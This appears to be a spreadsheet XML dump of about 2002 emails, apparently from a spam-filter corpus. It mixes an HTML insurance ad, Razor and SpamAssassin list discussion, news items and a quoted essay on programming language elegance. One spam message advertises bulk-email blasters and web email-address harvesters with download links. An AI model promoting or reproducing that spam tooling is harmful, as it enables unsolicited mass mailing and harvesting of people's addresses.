         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/slii/20020507-102.jpg" width=3D"331" =
 height=3D"242"&gt;&lt;br&gt;
                   &lt;img =
 src=3D"http://63.211.81.87/images/slii/20020507-104.gif" alt=3D"*Rake =
 not included" width=3D"331" height=3D"43"&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/slii/20020507-103.gif" width=3D"219" =
 height=3D"285" alt=3D"While getting 5.5% Comission and a bonus for =
 yourself!"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;br&gt;
             &lt;img src=3D"http://63.211.81.87/images/slii/20020507-2.gif" =
 width=3D"440" height=3D"77"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;hr width=3D"90%" size=3D"1" color=3D"#000000"&gt;
             &lt;font face=3D"Georgia, Times New Roman, Times, serif" =
 size=3D"3"&gt;&lt;img src=3D"http://63.211.81.87/images/slii/spacer.gif" =
 width=3D"28" height=3D"103" align=3D"left"&gt;&amp;#149;&amp;nbsp;&lt;b&gt;11.19%&lt;/b&gt;=20
             First Year (5.9% first year rate PLUS 5% premium bonus)&lt;br&gt;
             &amp;#149;&amp;nbsp;&lt;b&gt;5.5%&lt;/b&gt; Commission*, plus bonus (call for =
 details)&lt;br&gt;
             &amp;#149;&amp;nbsp;&lt;b&gt;Full death benefit&lt;/b&gt;&lt;br&gt;
             &amp;#149;&amp;nbsp;&lt;b&gt;10%&lt;/b&gt; free withdrawal after one year&lt;br&gt;
             &amp;#149;&amp;nbsp;Great for 1035's and transfers&lt;br&gt;
             &lt;/font&gt;=20
             &lt;hr width=3D"90%" size=3D"1" color=3D"#000000"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/slii/20020507-3.gif" width=3D"540" =
 height=3D"113" alt=3D"Free &amp;quot;A Salute to America&amp;quot; CD for the =
 first 100 callers!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Call=20
             or &lt;a href=3D"mailto:StandardLife@SMANCorp.com"&gt;e-mail&lt;/a&gt; =
 us today!&lt;br&gt;
             &lt;img src=3D"http://63.211.81.87/images/slii/20020507-4.gif" =
 width=3D"546" height=3D"78" alt=3D"800-767-7749"&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#ffffff"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Please=20
                           fill out the form below for more =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value=3D"StandardLife@SMANCorp.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"StandardLife Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/slii/20020507-5.jpg" width=3D"387" =
 height=3D"88"&gt;&lt;br&gt;
             &lt;font size=3D"2" face=3D"Arial, Helvetica, sans-serif"&gt;Visit =
 us online=20
             at: &lt;a =
 href=3D"http://www.standardagents.com"&gt;&lt;b&gt;www.StandardAgents.com&lt;/b&gt;&lt;/a&gt; =
             &lt;br&gt;
             &amp;nbsp;&lt;br&gt;
             &lt;font size=3D"1"&gt;*Commission reduces at older ages. For =
 agent use only.&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;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&lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"1" color=3D"#99CCFF"&gt;Legal=20
   Notice&lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_4365A_01C1FB64.2F304B00--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ink is speech
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85540997
 Date: Not supplied
 Ken "Oral Fixation" Starr has a new cause: fighting in the Supreme Court for 
 the First Amendment rights of Soth Carolinans to get and give tattoos. Link[1] 
 Discuss[2] (_Thanks, Jeremy!_)
 [1] http://story.news.yahoo.com/news?tmpl=story2&amp;u=/ap/20021007/ap_on_go_su_co/scotus_tattooing&amp;e=1
 [2] http://www.quicktopic.com/boing/H/yAyiDLnD6uew
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] many vs one
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 14 Aug 2002, Oates, Isaac wrote:
 &gt; I'm new to razor but have studied trust systems before.  I've been following
 &gt; the threads about TeS and have a few thoughts.
 &gt;
 &gt; First, a more complex algorithm is not always better.  As soon as you start
 &gt; accounting for edge cases in what should otherwise be a generalized
 &gt; algorithm, general performance begins to degrade exponentially.  The
 &gt; thing that razor should have going for it is numbers.  Say that razor
 &gt; has 100,000 people that actively use it (i.e. click the "Spam" button on
 &gt; their mail reader from time to time.)  If we decide that our objective
 &gt; is to screen 99.0% of spam, it means that we can continue to show what
 &gt; appears to be a piece of spam to 1,000 people and still meet our
 &gt; objective.
 &gt;
 &gt; Why not just wait for 1,000 people to vote that a piece of mail is indeed
 &gt; spam before ever acknowledging that it could potentially be spam?  In
 &gt; other words, when I razor-report a message, should I be able to tell
 &gt; that razor has ever even seen that message?
 Because you then have a system that is ineffective to a varying degree. A
 simplistic view would be that 999 subscribers received a piece of spam
 that could have otherwise been avoided. But the reality is likely that
 many, many more individuals would have received the piece of spam when you
 factor in report times.
 &gt; By having the server pretend to never have seen it, you can avoid
 &gt; people who just re-report spam because it was already marked as spam,
 &gt; something that is completely useless.
 Wrong. razor-check will tell you if a specific piece of mail matches
 something already in the database. If you have the system pretend to have
 never seen a piece of mail, how do you propose people use the system for
 filtering?
 &gt; What about revocations?  A revocation is after the fact because a
 &gt;  substantial number of people (1,000, in this example) have already
 &gt; decided that they do not want that message.  If it is marked as spam by
 &gt; all those people, and then people start revoking it, what does that
 &gt; mean?
 &gt; It means that the revokers have an opinion that probably doesn't mesh
 &gt; with the majority;
 No, it means that the people doing the revoking have a different opinion
 than the 1000 people who have submitted it as spam. Rather the 1000 people
 who have reported the message as spam constitute a majority or not is
 something that would have to be determined in the context of the
 individual message.
 &gt; instead of messing with its rating, why not just put
 &gt; it on the whitelist?  If I want that ZDNet mail, and most people think
 &gt; that ZDNet mail is just plain annoying, then why can't I whitelist it,
 &gt; instead of "arguing" with everyone about whether or not it's spam?
 You always have that ability.
 &gt; Correct me if I'm wrong, but it's not as if all mail from ZDNet will be
 &gt; banned in the future-just that one piece.  So if ZDNet were to change
 &gt; its system to make it easier to opt out, or whatever, people would hopefully
 &gt;  start unsubscribing instead of clicking the "Spam" button.
 It's my opinion that it's not my job to unsubscribe to any list that I
 haven't subscribed to, nor is it necessarily in my best interest given
 that some parties sending unwanted communications may utilize the
 unsubscribe request as a method of determining they are mailing a valid
 address.
 &gt; The inherent problem here, of course, is that someone can pretend to be
 &gt; 1,000 people and block anything they choose.  But say you still have a
 &gt; lightweight trust system built in, where when they "agree" with the
 &gt; majority (though they couldn't have known because razor hadn't
 &gt; acknowledged anything yet) then your trust rating goes up and vice
 &gt; versa.
 &gt;
 &gt; The key here is that, in order to be reliable, you need the numbers.  What
 &gt; am I missing here?
 See above.
 /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                                Patrick Greenwell
          Asking the wrong questions is the leading cause of wrong answers
 \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/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</si>
  <si>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10 die as Israeli helicopter fires on Palestinian crowd
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655710,215/
 Date: 2002-10-08T03:30:56+01:00
 *World latest: *Hundreds of Palestinians vent their anger as dozens of Israeli 
 tanks withdrew after a gruelling three-hour raid on the Gaza strip.
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthew Cline &lt;matt@nightrealms.com&gt; writes:
 &gt; There must be *some* way of tracking a spammer down, since they are
 &gt; planning on making money from the spam.  What a court would consider
 &gt; evidence of being the spammer is another question.
 Haha!!!
 Just a few notes:
  - It will be difficult to find, prosecute, and win money from someone
    in various non-friendly countries where spam originates (China is a
    good example) even if they do officially "respect" copyright law.
  - Law suits take time. Between now and conclusion of the first court
    case, we could have years of spam in our mail boxes!
  - Contact information can change: phone numbers, PO boxes, stolen
    cell phones, temporary email addresses, etc.
  - Spammers do not always remember to include contact information!  I
    don't understand it either, but nobody said they were bright.  Also,
    some spam is non-commercial or sent by a third-party (for example,
    "pump and dump" stock scams), so contact information is not strictly
    required for the spammer to get their way.
 Dan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</si>
  <si>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Direct Email Blaster, Email extractor, email downloader, email verify ...........
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;body&gt;
 &lt;div&gt;
   &lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;strong&gt;&lt;font color="#ff0080" size="4" face="Arial"&gt;Direct Email Blaster&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;font size="2"&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;font color="#006600"&gt;&lt;i&gt;The program will send mail at the 
 rate of over 1, 000 e-mails per minute.&amp;nbsp;&lt;/i&gt;&lt;/font&gt;&lt;br&gt;
 Legal and Fast sending bulk emails&amp;nbsp;&lt;br&gt;
 &lt;font color="#006600"&gt;&lt;i&gt;Built in SMTP server&amp;nbsp;&lt;/i&gt;&lt;/font&gt;&lt;br&gt;
 Have Return Path&amp;nbsp;&lt;br&gt;
 Can Check Mail Address&amp;nbsp;&lt;br&gt;
 &lt;font color="#006600"&gt;&lt;i&gt;Make Error Send Address List( Remove or Send Again)&amp;nbsp;&lt;/i&gt;&lt;/font&gt;&lt;br&gt;
 Support multi-threads.&amp;nbsp;&lt;br&gt;
 Support multi-smtp servers.&amp;nbsp;&lt;br&gt;
 Manages your opt-in E-Mail Lists&amp;nbsp;&lt;br&gt;
 Offers an easy-to-use interface!&amp;nbsp;&lt;br&gt;
 Easy to confige and use&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;a href="http://www.wldinfo.com/bj_download/edeb_set.zip"&gt;&lt;strong&gt;Download 
 Now&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;&lt;font color="#ff0080" size="4" face="Arial"&gt;Maillist Verify&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;Maillist Verify is intended for e-mail addresses and mail 
 lists verifying. The main task is to determine which of addresses in the mail 
 list are dead. The program is oriented, basically, on programmers which have 
 their own mail lists to inform their users about new versions of their programs.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;The program works on the same algorithm as ISP mail 
 systems do. Mail servers addresses for specified address are extracted from DNS. 
 The program tries to connect with found SMTP-servers and simulates the sending 
 of message. It does not come to the message &lt;nobr&gt;sending &amp;#8255;/NOBR&amp;gt; EMV 
 disconnect as soon as mail server informs does this address exist or not. EMV 
 can find about 90% of dead addresses &amp;#8255;/NOBR&amp;gt; some mail systems receive 
 all messages and only then see their addresses and if the address is dead send 
 the message back with remark about it.&lt;/nobr&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;nobr&gt;
 &lt;p&gt;&lt;a href="http://www.wldinfo.com/bj_download/bemv_set.zip"&gt;&lt;strong&gt;&lt;font size="3" face="Arial"&gt;Download 
 Now&lt;/font&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;&lt;font color="#ff0080" size="4" face="Arial"&gt;Express Email Blaster&amp;nbsp;&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;Express Email Blaster&amp;nbsp; is a very fast, powerful yet 
 simple to use email sender. Utilizing multiple threads/connections and multiple 
 SMTP servers your emails will be sent out fast and easily. There are User 
 Information, Attach Files, Address and Mail Logs four tabbed area for the 
 E-mails details for sending. About 25 SMTP servers come with the demo version, 
 and users may Add and Delete SMTP servers. About &lt;font color="#008000"&gt;&lt;b&gt;60,000&lt;/b&gt;&lt;/font&gt; 
 E-mails will be sent out per hour.&amp;quot;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;&lt;a href="http://www.wldinfo.com/bj_download/beeb_set.zip"&gt;&lt;font size="3" face="Arial"&gt;Download 
 Now&lt;/font&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;&lt;font color="#ff0080" size="4" face="Arial"&gt;Express Email Address 
 Extractor&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
 &lt;font size="4"&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="3" color="#008000"&gt;This program is the 
 most efficient, easy to use email address collector available on the internet! &lt;/font&gt;&lt;font color="#000000" size="3"&gt;Beijing 
 Express Email Address Extractor (ExpressEAE) is designed to extract e-mail 
 addresses from web-pages on the Internet (using HTTP protocols) .ExpressEAE 
 supports operation through many proxy-server and works very fast, as it is able 
 of loading several pages simultaneously, and requires very few resources.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#000000" face="Arial"&gt;&lt;font size="3"&gt;With 
 it, you will be able to&lt;/font&gt;&lt;font size="2"&gt; &lt;/font&gt;&lt;font size="3"&gt;use targeted 
 searches to crawl the world wide web, extracting thousands of clean, fresh email 
 addresses. Ably Email address Extractor is unlike other address collecting 
 programs, which limit you to one or two search engines and are unable to do auto 
 searches HUGE address. Most of them collect a high percentage of incomplete, 
 unusable addresses which will cause you serious problems when using them in a 
 mailing.&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
 &lt;ul&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Easier 
     to learn and use than any other email address collector program available.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Accesses 
     eight search engines&amp;nbsp;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Add 
     your own URLs to the list to be searched&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="3" face="Arial"&gt;&lt;font color="#008000"&gt;Supports 
     operation through &lt;/font&gt;&lt;font color="#ff00ff"&gt;a lot of&lt;/font&gt;&lt;font color="#008000"&gt; 
     proxy-server and works very fast (HTTP Proxy)&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Able 
     of loading several pages simultaneously&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Requires 
     very few resources&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Timeout 
     feature allows user to limit the amount of time crawling in dead sites and 
     traps.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="3" face="Arial"&gt;&lt;font color="#008000"&gt;Easy 
     to make &lt;/font&gt;&lt;font color="#ff00ff"&gt;Huge&lt;/font&gt;&lt;font color="#008000"&gt; 
     address list&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Pause/continue 
     extraction at any time.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Auto 
     connection to the Internet&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;div&gt;
   &lt;strong&gt;&lt;a href="http://www.wldinfo.com/bj_download/eeae_set.zip"&gt;&lt;font size="3" color="#008000" face="Arial"&gt;Download 
   Now&lt;/font&gt;&lt;/a&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;strong&gt;&lt;font color="#ff0080" face="Arial"&gt;Express Email Address Downloader&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;ul&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#006600" size="2"&gt;ExpressEAD&amp;nbsp; 
     &lt;/font&gt;&lt;font color="#000000" size="2"&gt;is a 32 bit Windows Program for e-mail 
     marketing. It is intended for easy and convenient search large e-mail 
     address lists from mail servers. The program can be operated on Windows 
     95/98/ME/2000 and NT.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#006600" size="2"&gt;ExpressEAD&amp;nbsp; 
     &lt;/font&gt;&lt;font color="#000000" size="2"&gt;support multi-threads (up to 1024 
     connections).&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#006600" size="2"&gt;ExpressEAD&amp;nbsp; 
     &lt;/font&gt;&lt;font color="#000000" size="2"&gt;has the ability&amp;nbsp; to reconnect to 
     the mail server if the server has disconnected and continue the searching at 
     the point where it has been interrupted.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#006600" size="2"&gt;ExpressEAD&amp;nbsp; 
     &lt;/font&gt;&lt;font color="#000000" size="2"&gt;has an ergonomic interface that is 
     easy to set up and simple to use.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;div&gt;
   &lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="4" face="Arial"&gt;Features:&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
 &lt;ul type="disc"&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="2" face="Arial"&gt;support 
     multi-threads.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="2" face="Arial"&gt;auto get smtp 
     server address,support multi-smtp servers.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="2" face="Arial"&gt;auto save&amp;nbsp; 
     E-Mail Lists&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="2" face="Arial"&gt;offers an 
     easy-to-use interface!&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;div&gt;
   &lt;strong&gt;&lt;a href="http://www.wldinfo.com/bj_download/eead_set.zip"&gt;&lt;font size="3" color="#008000" face="Arial"&gt;Download 
   Now&lt;/font&gt;&lt;/a&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;strong&gt;&lt;font color="#ff0080" face="Arial"&gt;Express Maillist Manager&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;font size="2"&gt;
   &lt;p&gt;&lt;font face="Arial"&gt;&lt;font color="black" size="3"&gt;This program was designed 
   to be a complement to the &lt;/font&gt;&lt;font color="#800080" size="3"&gt;Direct Email 
   Blaster&amp;nbsp; &lt;/font&gt;&lt;font color="black" size="3"&gt;and &lt;/font&gt;&lt;font color="#800080" size="3"&gt;Email 
   Blaster &lt;/font&gt;&lt;font color="black" size="3"&gt;suite of bulk email software 
   programs. Its purpose is to organize your email lists in order to be more 
   effective with your email marketing campaign. Some of its features include:&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
   &lt;p&gt;&lt;b&gt;&lt;font color="#008000" face="Arial"&gt;&lt;font size="3"&gt;&amp;#8255;Combine several 
   lists into one file.&lt;/font&gt;&lt;br&gt;
   &lt;font size="3"&gt;&amp;#8255;Split up larger lists to make them more manageable.&lt;/font&gt;&lt;br&gt;
   &lt;font size="3"&gt;&amp;#8255;Remove addresses from file.&lt;/font&gt;&lt;br&gt;
   &lt;font size="3"&gt;&amp;#8255;Manual editing, adding, and deleting of addresses.&lt;/font&gt;&lt;br&gt;
   &lt;font size="3"&gt;&amp;#8255;Ability to auto clean lists, that is, remove any 
   duplicate or unwanted addresses.&lt;/font&gt;&lt;br&gt;
   &lt;font size="3"&gt;&amp;#8255;Maintain all your address lists within the program so 
   you no&amp;nbsp; longer need to keep all your lists saved as separate text files.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p&gt;&lt;strong&gt;&lt;a href="http://www.wldinfo.com/bj_download/bemm_set.zip"&gt;&lt;font size="3" color="#008000" face="Arial"&gt;Download 
   Now&lt;/font&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
   &lt;p&gt;&lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
   &lt;p&gt;&lt;/p&gt;
   &lt;div&gt;
     &lt;font face="Arial"&gt;if you want to remove your email, please send email to &lt;a href="mailto:targetemailremoval@btamail.net.cn"&gt;targetemailremoval@btamail.net.cn&lt;/a&gt;&lt;/font&gt;
   &lt;/div&gt;
   &lt;div&gt;
     &lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt;
   &lt;/div&gt;
   &lt;div&gt;
     &lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt;
   &lt;/div&gt;
   &lt;font face="Arial"&gt;
   &lt;div&gt;
   &lt;/div&gt;
   &lt;/font&gt;&lt;/font&gt;
 &lt;/div&gt;
 &lt;/font&gt;&lt;/nobr&gt;&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;html&gt;&lt;body&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;                                          &lt;br&gt;&lt;a href=                            &gt;                                                                    &lt;/a&gt;&lt;br&gt;                                         &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 1052] bondedsender.com is a scam
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1052
 ------- Additional Comments From rOD-spamassassin@arsecandle.org  2002-10-03 18:51 -------
 Ignoring the conspiracy theories, can you supply examples of spam which was 
 scored with RCVD_IN_BONDEDSENDER?  The only mail I have received which scored 
 this were from Amazon.com.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</si>
  <si>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Gary Lawrence Murphy wrote:
 &gt; R. Buckminster Fuller
 &gt; 
 &gt; "It was only /after/ I'd completed the geodesic dome that I noticed it
 &gt; was beautiful" --- R. Buckminster Fuller
 I had cited the information theoretic concept of "elegance"
 in my dissertation &amp; did a Google to find the reference and instead
 found a really great tech report for UoT Knoxville by Bruce
 MacLennan.  He cites Efficiency, Economy, and Elegance, but
 I think he's wrong.  The middle E should be Effectiveness. 
 Otherwise kudos.
 Efficiency is the relation of output to input effectiveness is
 the total output.  In information theory, something is both elegant
 and efficient if no smaller or less costly something can product the 
 same output in the same amount of time. 
 Greg
 [1] http://www.cs.utk.edu/~mclennan/anon-ftp/Elegance.html
 ``Who Cares About Elegance?''
         The Role of Aesthetics in Programming Language Design 
                            Technical Report UT-CS-97-344
                                  Bruce J. MacLennan
                             Computer Science Department
                            University of Tennessee, Knoxville
                                MacLennan@cs.utk.edu 
 Abstract
 The crucial role played by aesthetics in programming language design and the importance of elegance in
 programming languages are defended on the basis of analogies with structural engineering, as presented in
 Billington's The Tower and the Bridge. 
 This report may be used for any nonprofit purpose provided that its source is acknowledged. It will be adapted
 for
 inclusion in the third edition of my Principles of Programming Languages. 
    1.The Value of Analogies 
    2.Efficiency Seeks to Minimize Resources Used 
    3.Economy Seeks to Maximize Benefit versus Cost 
    4.Elegance Symbolizes Good Design 
        1.For the Designer 
        2.For the User 
    5.The Programming Language as Work Environment 
    6.Acquiring a Sense of Elegance 
    7.References 
 The Value of Analogies
 Programming language design is a comparatively new activity - it has existed for less than half a century, so
 it is
 often worthwhile to look to older design disciplines to understand better this new activity. Thus, my book
 Principles of Programming Languages: Design, Evaluation, and Implementation, grew out of a study of teaching
 methods in architecture, primarily, but also of pedagogy in other disciplines, such as aircraft design.
 Perhaps you
 have also seen analogies drawn between programming languages and cars (FORTRAN = Model T, C = dune
 buggy, etc.). 
 These analogies can be very informative, and can serve as ``intuition pumps'' to enhance our creativity, but
 they
 cannot be used uncritically because they are, in the end, just analogies. Ultimately our design decisions must
 be
 based on more than analogies, since analogies can be misleading as well as informative. 
 In this essay I'll address the role of aesthetics in programming language design, but I will base my remarks
 on a
 book about structural engineering, The Tower and the Bridge, by David P. Billington. Although there are many
 differences between bridges and programming languages, we will find that many ideas and insights transfer
 rather
 directly. 
 According to Billington, there are three values common to many technological activities, which we can call
 ``the
 three E's'': Efficiency, Economy and Elegance. These values correspond to three dimensions of technology,
 which
 Billington calls the scientific, social and symbolic dimensions (the three S's). We will consider each in
 turn. 
 Efficiency Seeks to Minimize Resources Used
 In structural engineering, efficiency deals with the amount of material used; the basic criterion is safety
 and the
 issues are scientific (strength of materials, disposition of forces, etc.). Similarly, in programming language
 design,
 efficiency is a scientific question dealing with the use of resources. There are many examples where
 efficiency
 considerations influenced programming language design (some are reviewed in my Principles of Programming
 Languages). In the early days, the resources to be minimized were often runtime memory usage and processing
 time, although compile-time resource utilization was also relevant. In other cases the resource economized was
 programmer typing time, and there are well-known cases in which this compromised safety (e.g. FORTRAN's
 implicit declarations). There are also many well-known cases in which security (i.e. safety) was sacrificed
 for the
 sake of efficiency by neglecting runtime error checking (e.g. array bounds checking). 
 Efficiency issues often can be quantified in terms of computer memory or time, but we must be careful that we
 are
 not comparing apples and oranges. Compile time is not interchangeable run time, and neither one is the same as
 programmer time. Similarly, computer memory cannot be traded off against computer time unless both are
 reduced to a common denominator, such as money, but this brings in economic considerations, to which we now
 turn. 
 Economy Seeks to Maximize Benefit versus Cost
 Whereas efficiency is a scientific issue, economy is a social issue. In structural engineering, economy seeks
 to
 maximize social benefit compared to its cost. (This is especially appropriate since structures like bridges
 are
 usually built at public expense for the benefit of the public.) In programming language design, the ``public''
 that
 must be satisfied is the programming community that will use the language and the institutions for which these
 programmers work. 
 Economic tradeoffs are hard to make because economic values change and are difficult to predict. For example,
 the shift from first to second generation programming languages was largely a result of a decrease in the cost
 of
 computer time compared to programmer time, the shift from the second to the third generation involved the
 increasing cost of residual bugs in programs, and the fourth generation reflected the increasing cost of
 program
 maintenance compared to program development. 
 Other social factors involved in the success or failure of a programming language include: whether major
 manufacturers support the language, whether prestigious universities teach it, whether it is approved in some
 way
 by influential organizations (such as the US Department of Defense), whether it has been standardized, whether
 it
 comes to be perceived as a ``real'' language (used by ``real programmers'') or as a ``toy'' language (used by
 novices
